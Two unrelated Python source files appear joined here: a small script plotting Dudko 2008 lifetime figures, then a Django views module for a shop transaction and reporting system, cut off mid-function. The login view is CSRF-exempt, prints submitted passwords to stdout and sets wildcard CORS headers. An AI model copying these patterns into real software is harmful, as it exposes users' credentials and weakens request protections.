from EnergyLandscapes.Lifetime_Dudko2008.Python.TestExamples.Util import \
    Example_Data

def PlotFit(data,BaseName):
    """Save histogram and lifetime-fit figures for *data*.

    Writes <BaseName>_Histogram.png and <BaseName>_Lifetimes.png.
    """
    fig = Example_Data.PlotHistograms(data)
    fig.savefig(BaseName + "_Histogram.png")
    # Fix: close each figure after saving so repeated calls don't
    # accumulate open matplotlib figures in memory.
    plt.close(fig)
    fig = Example_Data.PlotLifetimesAndFit(data)
    fig.savefig(BaseName + "_Lifetimes.png")
    plt.close(fig)
    
def run():
    """Reproduce figures 1 and 2 from Dudko 2008 and save them to ../Out."""
    figures = [
        (Example_Data.Dudko2008Fig1_Probabilities, "../Out/Dudko2008_Fig1"),
        (Example_Data.Dudko2008Fig2_Probabilities, "../Out/Dudko2008_Fig2"),
    ]
    for load_probabilities, base_name in figures:
        PlotFit(load_probabilities(), base_name)




# Generate all plots when executed as a script.
if __name__ == "__main__":
    run()

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.shortcuts import render, redirect, HttpResponse
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from subscriber.models import Consumer, ConsumerType, Recharge, TotalRecharge, ACL
from product.models import Product
from voice_records.models import VoiceRecord, VoiceReg
from sms.models import SMSPayment
# from local_lib.v3 import is_number, is_float
from local_lib.v3 import is_number, is_float, is_bangladeshi_number, is_japanese_number, send_sms
from transaction.models import Transaction, ProductsInTransaction, BuyerSellerAccount, dueTransaction
from shop_inventory.models import Inventory, BuySellProfitInventoryIndividual, BuySellProfitInventory
from transcriber_management.models import Transcriber, TranscriberInTranscription, FailedTranscription
import datetime
from django.db.models import Q
from django.contrib.auth.models import User
from django.contrib.sessions.backends.db import SessionStore
from django.db.models import Count




@csrf_exempt
def login_page(request):
    """Render the bare login form."""
    template_name = 'pages/login.html'
    return render(request, template_name)


@csrf_exempt
def login_auth(request):
    """Authenticate POSTed credentials and route the user.

    Superusers are redirected to /admin, other active users to /.
    Failed or disabled logins re-render the form with an error message.
    If an ACL entry matches the last nine characters of the username,
    that suffix is used as the login name.
    """
    postdata = request.POST
    print(postdata)
    # Fix: the original condition `'username' and 'password' in postdata`
    # only tested 'password' — 'username' is a truthy string constant.
    if 'username' in postdata and 'password' in postdata:
        print(postdata['username'])
        login_username = postdata['username']
        print(postdata['password'])
        if ACL.objects.filter(loginID=postdata['username'][-9:]).exists():
            login_username = login_username[-9:]
        user = authenticate(username=login_username, password=postdata['password'])
        if user is not None:
            if user.is_active:
                login(request, user)
                request.session['user'] = login_username
                if user.is_superuser:
                    res = redirect('/admin')
                else:
                    res = redirect('/')
            else:
                res = render(request, 'pages/login.html',
                             {'wrong': True,
                              'text': 'The password is valid, but the account has been disabled!'})
        else:
            res = render(request, 'pages/login.html',
                         {'wrong': True,
                          'text': 'The username and password you have entered is not correct. Please retry'})
    else:
        res = render(request, 'pages/login.html', {'wrong': False})

    # CORS headers so the page can be called from other origins.
    res['Access-Control-Allow-Origin'] = "*"
    res['Access-Control-Allow-Headers'] = "Origin, X-Requested-With, Content-Type, Accept"
    res['Access-Control-Allow-Methods'] = "PUT, GET, POST, DELETE, OPTIONS"
    return res


def logout_now(request):
    """End the current session and show the login form again."""
    logout(request)
    return render(request, 'pages/login.html')


@login_required(login_url='/login/')
def home(request):
    """Role-based landing page / admin dashboard.

    Users present in the ACL table are routed to the index page for their
    role (Distributor, SR, Seller, Buyer) once they have changed their
    initial password; otherwise they are sent to /change_password/.
    Everyone else gets the admin dashboard with call/registration counts,
    per-day chart data for the current month, and transaction summaries.
    """
    transcriber_name = request.session['user']
    # Fix: print() call instead of the py2-only print statement.
    print(request.session['user'])
    if ACL.objects.filter(loginID=transcriber_name).exists():
        login_user = ACL.objects.get(loginID=transcriber_name)
        print(login_user.loginUser.name)
        transcriber_name = login_user.loginUser.name
        # Consolidated role -> template dispatch (was four identical
        # if/elif branches).
        role_templates = {
            'Distributor': 'pages/Distributor/index.html',
            'SR': 'pages/SR/index.html',
            'Seller': 'pages/Shop/index.html',
            'Buyer': 'pages/Consumer/index.html',
        }
        template = role_templates.get(login_user.loginUser.type.type_name)
        if template is not None:
            # number_of_child doubles as a "password was changed" marker.
            if login_user.loginUser.number_of_child == 'CHANGED !!!':
                return render(request, template, {'transcriber_name': transcriber_name})
            return redirect('/change_password/')
    else:
        number_of_reg_calls = VoiceReg.objects.filter().count()
        number_of_transaction_calls = VoiceRecord.objects.filter().count()
        total = number_of_reg_calls + number_of_transaction_calls
        if total > 0:
            reg_call_percentage = (number_of_reg_calls / float(total)) * 100
            transaction_call_percentage = (number_of_transaction_calls / float(total)) * 100
        else:
            transaction_call_percentage = 0
            reg_call_percentage = 0
        today_month = datetime.date.today().month
        today_year = datetime.date.today().year
        # Per-day chart series, built as javascript array literals.
        data_2 = ''
        data_3 = ''
        data_4 = ''
        data_5 = ''
        data_6 = ''
        # Fix: renamed from `max`, which shadowed the builtin.
        peak_calls = 0
        max_table_2 = 0
        total_sell = VoiceRecord.objects.filter(purpose='sell').count()
        total_buy = VoiceRecord.objects.filter(purpose='buy').count()
        total_money_transaction = SMSPayment.objects.filter().count()
        total_for_chart2 = number_of_reg_calls + number_of_transaction_calls
        if total_for_chart2 > 0:
            sell_percentage = (total_sell / float(total_for_chart2)) * 100
            buy_percentage = (total_buy / float(total_for_chart2)) * 100
            money_transaction_percentage = (total_money_transaction / float(total_for_chart2)) * 100
        else:
            sell_percentage = 0
            buy_percentage = 0
            money_transaction_percentage = 0
        # One data point per day of the current month (1..31).
        for day in range(1, 32):
            total_call_that_day = VoiceRecord.objects.filter(DateAdded__month=today_month,
                                                             DateAdded__year=today_year, DateAdded__day=day).count()
            total_reg_that_day = VoiceReg.objects.filter(DateAdded__month=today_month,
                                                         DateAdded__year=today_year, DateAdded__day=day).count()
            # Chart y-axis ceiling: highest daily count plus some headroom.
            if peak_calls < total_call_that_day:
                peak_calls = total_call_that_day + 2
            if peak_calls < total_reg_that_day:
                peak_calls = total_reg_that_day + 2

            data_2 += '[gd(%s, %s, %s), %s],' % (today_year, today_month, day, total_call_that_day)
            data_3 += '[gd(%s, %s, %s), %s],' % (today_year, today_month, day, total_reg_that_day)
            total_buy_that_day = VoiceRecord.objects.filter(DateAdded__month=today_month,
                                                            DateAdded__year=today_year,
                                                            DateAdded__day=day,
                                                            purpose='buy').count()
            total_sell_that_day = VoiceRecord.objects.filter(DateAdded__month=today_month,
                                                             DateAdded__year=today_year,
                                                             DateAdded__day=day,
                                                             purpose='sell').count()
            total_payment_that_day = SMSPayment.objects.filter(DateAdded__month=today_month,
                                                               DateAdded__year=today_year,
                                                               DateAdded__day=day).count()
            if max_table_2 < total_buy_that_day:
                max_table_2 = total_buy_that_day + 2
            if max_table_2 < total_sell_that_day:
                max_table_2 = total_sell_that_day + 2
            if max_table_2 < total_payment_that_day:
                max_table_2 = total_payment_that_day + 2
            data_4 += '[gd(%s, %s, %s), %s],' % (today_year, today_month, day, total_buy_that_day)
            data_5 += '[gd(%s, %s, %s), %s],' % (today_year, today_month, day, total_sell_that_day)
            data_6 += '[gd(%s, %s, %s), %s],' % (today_year, today_month, day, total_payment_that_day)
        # Drop each series' trailing comma.
        data_2 = data_2[:-1]
        data_3 = data_3[:-1]
        data_4 = data_4[:-1]
        data_5 = data_5[:-1]
        data_6 = data_6[:-1]
        number_of_transactions = Transaction.objects.filter().count()
        number_of_transactions_with_due = Transaction.objects.filter(total_due__gt=0).count()
        number_of_transactions_without_due = Transaction.objects.filter(total_due__lte=0).count()
        shop_consumer = ConsumerType.objects.get(type_name='Seller')
        all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
        all_user_for_base = Consumer.objects.all()
        shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
        all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)
        print(all_consumer_for_base.count)
        return render(request, 'pages/index.html', {'shop_list_base': all_shop_for_base,
                                                    'number_of_reg_calls': number_of_reg_calls,
                                                    'transcriber_name': transcriber_name,
                                                    'number_of_transaction_calls': number_of_transaction_calls,
                                                    'all_consumer_for_base': all_consumer_for_base,
                                                    'reg_call_percentage': reg_call_percentage,
                                                    'transaction_call_percentage': transaction_call_percentage,
                                                    'data_2': data_2,
                                                    'data_3': data_3,
                                                    'data_4': data_4,
                                                    'data_5': data_5,
                                                    'data_6': data_6,
                                                    'max': peak_calls,
                                                    'number_of_transactions': number_of_transactions,
                                                    'number_of_transactions_with_due': number_of_transactions_with_due,
                                                    'number_of_transactions_without_due': number_of_transactions_without_due,
                                                    'max_table_2': max_table_2,
                                                    'total_sell': total_sell,
                                                    'total_buy': total_buy,
                                                    'total_money_transaction': total_money_transaction,
                                                    'sell_percentage': sell_percentage,
                                                    'buy_percentage': buy_percentage,
                                                    'money_transaction_percentage': money_transaction_percentage,
                                                    'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def translator_page(request):
    """Render the translator page with the standard sidebar context."""
    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')
    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'transcriber_name': request.session['user'],
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'pages/translator.html', context)


# all report views are here
@login_required(login_url='/login/')
def report_monthly_shop(request):
    """Render the monthly sales/purchase report for one shop.

    The shop is selected by name via the `shop` query parameter; the
    presence of a `ban` parameter switches the template to Bangla.
    """
    get_data = request.GET
    bangla = 'ban' in get_data

    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    shop_id = shop_object.id

    # Totals where this shop is the seller.
    total_sell = total_sell_due = total_sell_paid = 0
    for account in BuyerSellerAccount.objects.filter(seller=shop_object):
        total_sell += account.total_amount_of_transaction
        total_sell_due += account.total_due
        total_sell_paid += account.total_paid

    # Totals where this shop is the buyer.
    total_purchase = total_purchase_due = total_purchase_paid = 0
    for account in BuyerSellerAccount.objects.filter(buyer=shop_object):
        total_purchase += account.total_amount_of_transaction
        total_purchase_due += account.total_due
        total_purchase_paid += account.total_paid

    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')

    return render(request, 'pages/report_monthly_shop.html',
                  {'shop_list_base': Consumer.objects.filter(type=seller_type),
                   'shop_name': shop_name,
                   'shop_id': shop_id,
                   'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
                   'total_sell': total_sell,
                   'transcriber_name': request.session['user'],
                   'total_sell_due': total_sell_due,
                   'total_sell_paid': total_sell_paid,
                   'bangla': bangla,
                   'total_purchase': total_purchase,
                   'total_purchase_due': total_purchase_due,
                   'total_purchase_paid': total_purchase_paid,
                   'all_user_for_base': Consumer.objects.all()})

# report_monthly_shop_json
@login_required(login_url='/login/')
def report_monthly_shop_json(request):
    """Return monthly shop report rows as a JSON string.

    GET params:
        shop -- primary key of the shop (Consumer) to report on.
        t    -- report type: '1' = per-day sell/purchase totals for the
                current year, '2' = every transaction involving the shop.

    The JSON is assembled by hand; each row ends with " ," and the final
    trailing comma is stripped before the closing bracket.
    """
    get_data = request.GET
    shop_object = Consumer.objects.get(id=get_data['shop'])
    output = '{"data": [ '

    if get_data['t'] == '1':
        this_year = datetime.date.today().year
        for this_month in range(1, 13):
            for this_day in range(1, 32):
                # Non-existent dates (e.g. 31 Feb) match no transactions and
                # therefore produce no row.  The original wrapped these two
                # queries in a loop over every Product even though the filters
                # never reference the product, re-running identical queries
                # once per product; that redundancy is removed here and the
                # emitted totals are unchanged.
                count = 0
                total_sell = 0
                total_due = 0
                total_paid = 0
                for sell_tx in Transaction.objects.filter(seller=shop_object,
                                                          DateAdded__year=this_year,
                                                          DateAdded__month=this_month,
                                                          DateAdded__day=this_day):
                    total_sell += sell_tx.total_amount
                    total_due += sell_tx.total_due
                    total_paid += sell_tx.total_paid
                    count += 1

                total_purchase = 0
                total_purchase_due = 0
                total_purchase_paid = 0
                for buy_tx in Transaction.objects.filter(buyer=shop_object,
                                                         DateAdded__year=this_year,
                                                         DateAdded__month=this_month,
                                                         DateAdded__day=this_day):
                    total_purchase += buy_tx.total_amount
                    total_purchase_due += buy_tx.total_due
                    total_purchase_paid += buy_tx.total_paid
                    count += 1

                if count > 0:
                    output += '["%s/%s/%s","%s","%s","%s","%s","%s","%s"] ,' % (this_day, this_month, this_year,
                                                                                total_sell, total_paid, total_due,
                                                                                total_purchase, total_purchase_paid,
                                                                                total_purchase_due)
    if get_data['t'] == '2':
        for tx in Transaction.objects.filter(Q(seller=shop_object) | Q(buyer=shop_object)):
            # The Q filter guarantees the shop is either seller or buyer.
            if tx.seller == shop_object:
                with_trade = tx.buyer
                trade_type = 'Sell'
            else:
                with_trade = tx.seller
                trade_type = 'Buy'
            number_of_items = ProductsInTransaction.objects.filter(TID=tx).count()
            output += '["%s","%s","%s","%s","%s","%s","%s","%s"] ,' % (tx.pk, tx.DateAdded, with_trade,
                                                                       trade_type, number_of_items,
                                                                       tx.total_amount, tx.total_paid,
                                                                       tx.total_due)

    output = output[:-1]  # drop the trailing comma (or the pad space when empty)
    output += ']}'
    return HttpResponse(output, content_type="text/plain")


@login_required(login_url='/login/')
def report_sales_analysis(request):
    """Render the sales-analysis page for the shop named in the query string."""
    params = request.GET
    bangla = 'ban' in params

    shop_name = params['shop']
    shop = Consumer.objects.get(name=shop_name)

    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')

    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'shop_name': shop_name,
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'shop_id': shop.id,
        'bangla': bangla,
        'transcriber_name': request.session['user'],
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'pages/report_sales_analysis.html', context)


@login_required(login_url='/login/')
def report_sales_analysis_json(request):
    """Return sales-analysis rows for one shop as a hand-built JSON string.

    GET params:
        shop -- primary key of the shop (Consumer) being analysed.
        t    -- report type:
                '1' total quantity sold per product (all time),
                '2' mean absolute price change per product,
                '3' per-product sales for each day of the current month,
                '4' per-product sales grouped by weekday,
                '5' per-product accumulated profit.

    Every emitted row ends with a trailing comma that is stripped just
    before the closing "]}" so the result parses as JSON.
    """
    get_data = request.GET
    shop_name = get_data['shop']
    # NOTE(review): despite the variable name, 'shop' holds the Consumer id
    # here (the sibling page views look the shop up by name) -- confirm callers.
    shop_object = Consumer.objects.get(id=shop_name)

    # Both of these are computed but never read below.
    shop_inventory = BuySellProfitInventoryIndividual.objects.filter(shop=shop_object)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    output = '{"data": [ '

    if get_data['t'] == '1':
        # Rank / name / quantity rows, one per product that sold at all.
        rank = 1
        for a_product in Product.objects.all():
            count = 0
            product_price = 0
            product_name = a_product.name
            for this_day_transaction in Transaction.objects.filter(seller=shop_object):
                # start counting for this product
                for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                    if product_in_this_transaction.product == a_product:
                        if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                            # Sold in the bulk unit: convert quantity/price to
                            # retail units unless no conversion factor is
                            # configured (0 presumably means "no conversion" --
                            # confirm against the Product model).
                            if a_product.bulk_to_retail_unit == 0:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit
                            else:
                                count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                        else:
                            count = count + product_in_this_transaction.quantity
                            product_price = product_price + product_in_this_transaction.price_per_unit

            if count > 0:
                # product_price is accumulated above but not shown in this view.
                output += '["%s","%s","%s"] ,' % (rank, product_name, str(count) + ' ' + a_product.retail_unit)
                rank += 1
    if get_data['t'] == '2':
        # Rank / name / observations / mean absolute deviation of each later
        # price from the first observed price.
        rank = 1
        for a_product in Product.objects.all():
            count = 0

            product_price = 0
            previous_product_price = 0
            change = 0
            product_name = a_product.name
            for this_day_transaction in Transaction.objects.filter(seller=shop_object):
                # start counting for this product
                for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                    if product_in_this_transaction.product == a_product:
                        if count == 0:
                            # Baseline is the first sighting; it is never
                            # updated again, so 'change' compares every later
                            # price against the first one.
                            previous_product_price = product_in_this_transaction.price_per_unit
                        product_price = product_in_this_transaction.price_per_unit
                        change += abs(previous_product_price - product_price)
                        count += 1
            if count > 0:
                # NOTE(review): change/count truncates if both are ints on
                # Python 2 -- confirm the runtime and the field types.
                output += '["%s","%s","%s","%s"] ,' % (rank, product_name, count,
                                                       change/count)
                rank += 1
    if get_data['t'] == '3':
        # Current-month daily breakdown: a date header row, then one row per
        # product sold that day (rank, name, quantity, average unit price).
        this_year = datetime.date.today().year
        this_month = datetime.date.today().month
        day = 1

        # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
        while day < 32:
            # Impossible dates (e.g. 31 Feb) match nothing and emit nothing.
            day_string = True
            rank = 1
            for a_product in Product.objects.all():
                count = 0
                product_price = 0
                product_name = a_product.name

                for this_day_transaction in Transaction.objects.filter(seller=shop_object, DateAdded__year=this_year,
                                                                       DateAdded__month=this_month, DateAdded__day=day):
                    # start counting for this product

                    for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):

                        if product_in_this_transaction.product == a_product:
                            if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                                # Bulk sale: convert to retail units unless no
                                # conversion factor is configured (0).
                                if a_product.bulk_to_retail_unit == 0:
                                    count = count + product_in_this_transaction.quantity
                                    product_price = product_price + product_in_this_transaction.price_per_unit
                                else:
                                    count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                    product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                            else:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit

                if count > 0:
                    if day_string:
                        # Emit the date header once per day with any sales.
                        output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
                        day_string = False
                    # NOTE(review): product_price / count divides before
                    # float() is applied -- integer truncation on Python 2.
                    output += '["","%s","%s","%s","%s"] ,' % (rank, product_name,
                                                              str(count) + ' ' + a_product.retail_unit,
                                                              float(product_price / count))
                    rank += 1
            day += 1
            # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
    if get_data['t'] == '4':
        # Weekday breakdown.  Django's week_day lookup numbers days
        # 1=Sunday .. 7=Saturday, matching the header chain below.
        day = 1

        # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
        while day < 8:
            day_string = True
            rank = 1
            for a_product in Product.objects.all():
                count = 0
                product_price = 0
                product_name = a_product.name

                for this_day_transaction in Transaction.objects.filter(seller=shop_object, DateAdded__week_day=day):
                    # start counting for this product

                    for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):

                        if product_in_this_transaction.product == a_product:
                            if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                                # Same bulk-to-retail conversion as type 3.
                                if a_product.bulk_to_retail_unit == 0:
                                    count = count + product_in_this_transaction.quantity
                                    product_price = product_price + product_in_this_transaction.price_per_unit
                                else:
                                    count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                    product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                            else:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit

                if count > 0:
                    if day_string:
                        # One weekday-name header per weekday with any sales.
                        if day == 1:
                            output += '["%s","","","",""] ,' % 'Sunday'
                        elif day == 2:
                            output += '["%s","","","",""] ,' % 'Monday'
                        elif day == 3:
                            output += '["%s","","","",""] ,' % 'Tuesday'
                        elif day == 4:
                            output += '["%s","","","",""] ,' % 'Wednesday'
                        elif day == 5:
                            output += '["%s","","","",""] ,' % 'Thursday'
                        elif day == 6:
                            output += '["%s","","","",""] ,' % 'Friday'
                        elif day == 7:
                            output += '["%s","","","",""] ,' % 'Saturday'
                        day_string = False
                    output += '["","%s","%s","%s","%s"] ,' % (rank, product_name,
                                                              str(count) + ' ' + a_product.retail_unit,
                                                              float(product_price / count))
                    rank += 1
            day += 1
    if get_data['t'] == '5':
        # All-time profit per product.  this_year and day_string are set but
        # never used in this branch; a row is emitted for every product,
        # even those with no matching profit records.
        this_year = datetime.date.today().year
        day_string = True
        for a_product in Product.objects.all():
            count = 0
            product_profit = 0
            product_name = a_product.name
            for this_day_transaction in BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object):
                # start counting for this product
                if this_day_transaction.product == a_product:
                    product_profit += this_day_transaction.profit
                    count += 1
            output += '["%s","%s"] ,' % (product_name, product_profit)
    # Strip the trailing comma (or the pad space when no rows were emitted).
    output = output[:-1]
    output += ']}'
    return HttpResponse(output, content_type="text/plain")


@login_required(login_url='/login/')
def report_payment(request):
    """Render the payment report for the shop named in the query string."""
    params = request.GET
    bangla = 'ban' in params

    shop_name = params['shop']
    shop = Consumer.objects.get(name=shop_name)

    # NOTE(review): total_due__lte=0 selects records with NO outstanding due
    # despite the "_with_due" context keys -- presumably the settled/paid
    # report; confirm against the template.
    settled_sells = Transaction.objects.filter(seller_id=shop, total_due__lte=0)
    settled_buys = Transaction.objects.filter(buyer_id=shop, total_due__lte=0)
    settled_buyer_accounts = BuyerSellerAccount.objects.filter(seller=shop, total_due__lte=0)
    settled_seller_accounts = BuyerSellerAccount.objects.filter(buyer=shop, total_due__lte=0)

    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')

    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'sell_transaction_with_due': settled_sells,
        'buy_transaction_with_due': settled_buys,
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'buyer_account': settled_buyer_accounts,
        'transcriber_name': request.session['user'],
        'seller_account': settled_seller_accounts,
        'shop_name': shop_name,
        'bangla': bangla,
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'pages/report_payment.html', context)


@login_required(login_url='/login/')
def report_due(request):
    """Render the outstanding-due report for the shop named in the query string."""
    params = request.GET
    bangla = 'ban' in params

    shop_name = params['shop']
    shop = Consumer.objects.get(name=shop_name)

    # Transactions that still carry a positive due amount.
    outstanding_sells = Transaction.objects.filter(seller_id=shop, total_due__gt=0)
    outstanding_buys = Transaction.objects.filter(buyer_id=shop, total_due__gt=0)
    payments_as_seller = SMSPayment.objects.filter(seller=shop)
    payments_as_buyer = SMSPayment.objects.filter(buyer=shop)

    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')

    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'sell_transaction_with_due': outstanding_sells,
        'buy_transaction_with_due': outstanding_buys,
        'buyer_account': payments_as_seller,
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'bangla': bangla,
        'seller_account': payments_as_buyer,
        'transcriber_name': request.session['user'],
        'shop_name': shop_name,
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'pages/report_due.html', context)


@login_required(login_url='/login/')
def report_profit(request):
    """Render the profit report page for the shop named in the query string."""
    params = request.GET
    shop_name = params['shop']
    shop = Consumer.objects.get(name=shop_name)
    bangla = 'ban' in params

    seller_type = ConsumerType.objects.get(type_name='Seller')
    buyer_type = ConsumerType.objects.get(type_name='Buyer')

    context = {
        'shop_list_base': Consumer.objects.filter(type=seller_type),
        'shop_name': shop_name,
        'shop_id': shop.id,
        'all_consumer_for_base': Consumer.objects.filter(type=buyer_type),
        'bangla': bangla,
        'transcriber_name': request.session['user'],
        'all_user_for_base': Consumer.objects.all(),
    }
    return render(request, 'pages/report_profit.html', context)


@login_required(login_url='/login/')
def report_profit_json(request):
    """Return per-product profit rows for one shop as a JSON string.

    GET params:
        shop -- primary key of the shop (Consumer).
        t    -- report type:
                '1' profit per product grouped by month (current year),
                '2' profit per product grouped by day (current year),
                '3' profit per product for the current month,
                '4' profit per product for the current year,
                '5' profit per product over all time.

    Every row ends with a trailing comma that is stripped before the
    closing "]}" so the result parses as JSON.
    """
    get_data = request.GET
    shop_object = Consumer.objects.get(id=get_data['shop'])
    output = '{"data": [ '

    # Header labels for the type-1 report; replaces the original 12-branch
    # if/elif chain (index is the 1-based month number minus one).
    month_names = ('January', 'February', 'March', 'April', 'May', 'June',
                   'July', 'August', 'September', 'October', 'November',
                   'December')

    def _profit_and_count(a_product, rows):
        # Sum the profit of `rows` belonging to `a_product`; also return how
        # many rows matched so callers can skip products with no activity.
        profit = 0
        matched = 0
        for row in rows:
            if row.product == a_product:
                profit += row.profit
                matched += 1
        return profit, matched

    if get_data['t'] == '1':
        this_year = datetime.date.today().year
        for this_month in range(1, 13):
            header_pending = True
            for a_product in Product.objects.all():
                profit, matched = _profit_and_count(
                    a_product,
                    BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object,
                                                                    DateAdded__year=this_year,
                                                                    DateAdded__month=this_month))
                if matched > 0:
                    if header_pending:
                        # One month-name header per month with any activity.
                        output += '["%s","",""], ' % month_names[this_month - 1]
                        header_pending = False
                    output += '["","%s","%s"] ,' % (a_product.name, profit)
    if get_data['t'] == '2':
        this_year = datetime.date.today().year
        for this_month in range(1, 13):
            for day in range(1, 32):
                # Impossible dates (e.g. 31 Feb) match nothing and emit nothing.
                header_pending = True
                for a_product in Product.objects.all():
                    profit, matched = _profit_and_count(
                        a_product,
                        BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object,
                                                                        DateAdded__year=this_year,
                                                                        DateAdded__month=this_month,
                                                                        DateAdded__day=day))
                    if matched > 0:
                        if header_pending:
                            # One date header per day with any activity.
                            output += '["%s/%s/%s","",""] ,' % (day, this_month, this_year)
                            header_pending = False
                        output += '["","%s","%s"] ,' % (a_product.name, profit)
    if get_data['t'] == '3':
        today = datetime.date.today()
        for a_product in Product.objects.all():
            profit, _matched = _profit_and_count(
                a_product,
                BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object,
                                                                DateAdded__year=today.year,
                                                                DateAdded__month=today.month))
            # Unlike types 1/2, a row is emitted even when nothing matched.
            output += '["%s","%s"] ,' % (a_product.name, profit)
    if get_data['t'] == '4':
        this_year = datetime.date.today().year
        for a_product in Product.objects.all():
            profit, _matched = _profit_and_count(
                a_product,
                BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object,
                                                                DateAdded__year=this_year))
            output += '["%s","%s"] ,' % (a_product.name, profit)
    if get_data['t'] == '5':
        for a_product in Product.objects.all():
            profit, _matched = _profit_and_count(
                a_product,
                BuySellProfitInventoryIndividual.objects.filter(shop_id=shop_object))
            output += '["%s","%s"] ,' % (a_product.name, profit)

    output = output[:-1]  # strip the trailing comma (or pad space when empty)
    output += ']}'
    return HttpResponse(output, content_type="text/plain")





@login_required(login_url='/login/')
def report_product(request):
    """Render the product report page for the shop named in the query string.

    Fix: the original filtered ProductsInTransaction with
    ``TID=<queryset>``, which Django translates to ``TID = (subquery)`` and
    fails as soon as the shop has more than one transaction; ``TID__in`` is
    the documented form for multi-row subqueries.
    """
    get_data = request.GET
    shop_name = get_data['shop']
    bangla = 'ban' in get_data
    shop_object = Consumer.objects.get(name=shop_name)
    shop_id = shop_object.id
    shop_inventory = Inventory.objects.filter(shop=shop_object)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')

    # __in handles the common case of a shop with many transactions.
    selected_products = ProductsInTransaction.objects.filter(
        TID__in=Transaction.objects.filter(seller=shop_object))
    selected_products_buy = ProductsInTransaction.objects.filter(
        TID__in=Transaction.objects.filter(buyer=shop_object))

    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_product.html', {'shop_list_base': all_shop_for_base,
                                                         'shop_inventory': shop_inventory,
                                                         'shop_name': shop_name,
                                                         'shop_id': shop_id,
                                                         'bangla': bangla,
                                                         'all_consumer_for_base' :all_consumer_for_base,
                                                         'transcriber_name': transcriber_name,
                                                         'selected_products_buy': selected_products_buy,
                                                         'selected_products': selected_products,
                                                         'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_product_json(request):
    """Build the product-report rows as a DataTables-style JSON payload.

    Query parameters:
        shop -- primary key of the Consumer whose report is requested.
        t    -- report type: '1' daily sales and '2' daily purchases
                (current month, grouped by day), '3' monthly sales,
                '4' monthly purchases.

    Returns ``{"data": [ [...], ... ]}`` as a text/plain HttpResponse.
    """
    get_data = request.GET
    shop_object = Consumer.objects.get(id=get_data['shop'])
    output = '{"data": [ '

    if get_data['t'] == '1':
        # Daily sales: one date-header row per day that had sales, then one
        # row per product sold that day.
        this_year = datetime.date.today().year
        this_month = datetime.date.today().month
        day = 1
        while day < 32:
            day_string = True  # emit the date header only once per day
            for a_product in Product.objects.all():
                count = 0
                product_price = 0
                product_name = a_product.name
                for this_day_transaction in Transaction.objects.filter(seller=shop_object, DateAdded__year=this_year,
                                                                       DateAdded__month=this_month, DateAdded__day=day):
                    for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                        if product_in_this_transaction.product == a_product:
                            count = count + product_in_this_transaction.quantity
                            product_price = product_price + product_in_this_transaction.price_per_unit * product_in_this_transaction.quantity
                if count > 0:
                    if day_string:
